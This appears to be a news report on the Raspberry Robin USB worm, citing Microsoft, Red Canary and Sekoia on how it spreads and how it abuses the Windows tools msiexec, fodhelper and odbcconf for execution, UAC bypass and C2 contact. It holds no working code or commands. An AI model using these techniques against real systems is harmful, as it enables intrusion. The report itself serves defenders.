Microsoft claims that a Windows worm was recently discovered on networks of many organizations across different industry sectors.
Raspberry Robin is malware that spreads through infected USB devices. It was first detected by Red Canary intelligence analysts in September 2021.
Sekoia, a cybersecurity firm, also observed that it used QNAP NAS devices to command and control servers (C2) servers) in November. Microsoft claimed it had found malicious artifacts related to the worm in 2019.
Redmond's findings align with the Red Canary's Detection Engineering group, which also found the worm on multiple customers' networks, some in technology and manufacturing.
Microsoft detected the malware connecting with addresses on the Tor network. However, the threat actors have yet to exploit the access they gain to their victims' networks.
Although they could easily escalate attacks, malware can bypass User Account Control (UAC) on infected systems using legitimate Windows tools.
This information was shared by Microsoft in a private threat advisory that was shared with only Microsoft Defender Endpoint subscribers.
Abuses Windows legitimate tools to infect new devices
Raspberry Robin, as previously mentioned, is spreading via infected USB drives that contain a malicious .LNK file.
Once the USB device is attached, and the user clicks the link, the worm spawns a msiexec process using cmd.exe to launch a malicious file stored on the infected drive.
It infects Windows-based devices and communicates with C2 command and control servers (C2) to execute malicious payloads using several legitimate Windows utilities:
1. fodhelper is a trusted binary to manage features in Windows settings
2. msiexec is the command-line Windows Installer component
3. ODBC drivers can be configured using odbcconf
Red Canary researchers stated that while msiexec.exe executes legitimate installer programs, it can also be used by adversaries to deliver malware.
"Raspberry Robin uses the msiexec.exe command to try to communicate with an external network to a malicious domain to perform C2 purposes."
Raspberry Robin malware was discovered in the wild by security researchers. However, they are yet to attribute it to a threat group and are still trying to find its intended target.
However, Microsoft rated this campaign high-risk because the attackers could install additional malware on the victim's networks and even escalate their privileges.